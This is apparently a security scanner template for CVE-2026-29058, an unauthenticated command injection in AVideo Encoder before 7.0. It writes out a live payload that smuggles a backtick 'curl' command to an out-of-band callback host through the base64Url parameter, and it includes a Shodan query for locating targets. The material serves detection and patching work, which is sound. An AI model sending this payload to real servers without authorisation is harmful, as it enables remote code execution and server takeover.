Description
AVideo < 7.0 contains a command injection caused by shell command substitution in the base64Url GET parameter, letting unauthenticated attackers execute arbitrary OS commands, exploit requires no authentication.
AVideo < 7.0 contains a command injection caused by shell command substitution in the base64Url GET parameter, letting unauthenticated attackers execute arbitrary OS commands, exploit requires no authentication.
id: CVE-2026-29058
info:
name: WWBN AVideo Encoder < 7.0 - Unauthenticated OS Command Injection
author: ashish-cybersec
severity: critical
description: |
AVideo < 7.0 contains a command injection caused by shell command substitution in the base64Url GET parameter, letting unauthenticated attackers execute arbitrary OS commands, exploit requires no authentication.
impact: |
Unauthenticated attackers can execute arbitrary OS commands, leading to full server compromise, data exfiltration, and service disruption.
remediation: |
Upgrade to version 7.0 or later.
reference:
- https://github.com/WWBN/AVideo-Encoder/security/advisories/GHSA-9j26-99jh-v26q
- https://nvd.nist.gov/vuln/detail/CVE-2026-29058
- https://github.com/WWBN/AVideo-Encoder
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-29058
epss-score: 0.06773
epss-percentile: 0.93817
cwe-id: CWE-78
metadata:
verified: true
max-request: 1
vendor: wwbn
product: avideo
shodan-query: http.html:"AVideo"
tags: cve,cve2026,avideo,encoder,rce,oast,unauth,intrusive,vkev
variables:
oast: "http://{{rand_text_alpha(6)}}.example/`curl${IFS}{{interactsh-url}}`"
http:
- raw:
- |
GET /Encoder/objects/getImage.php?base64Url={{base64(oast)}}&format=png HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 200
# digest: 4a0a00473045022100a76cad0492b24d5c1425cb8ce6364858ba3c33a28a37050161d2545d2d4ba64002207dc40b243d40e93b02be22ef8c9941a400e807a2e6769c23d99cfd64efeceb59:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.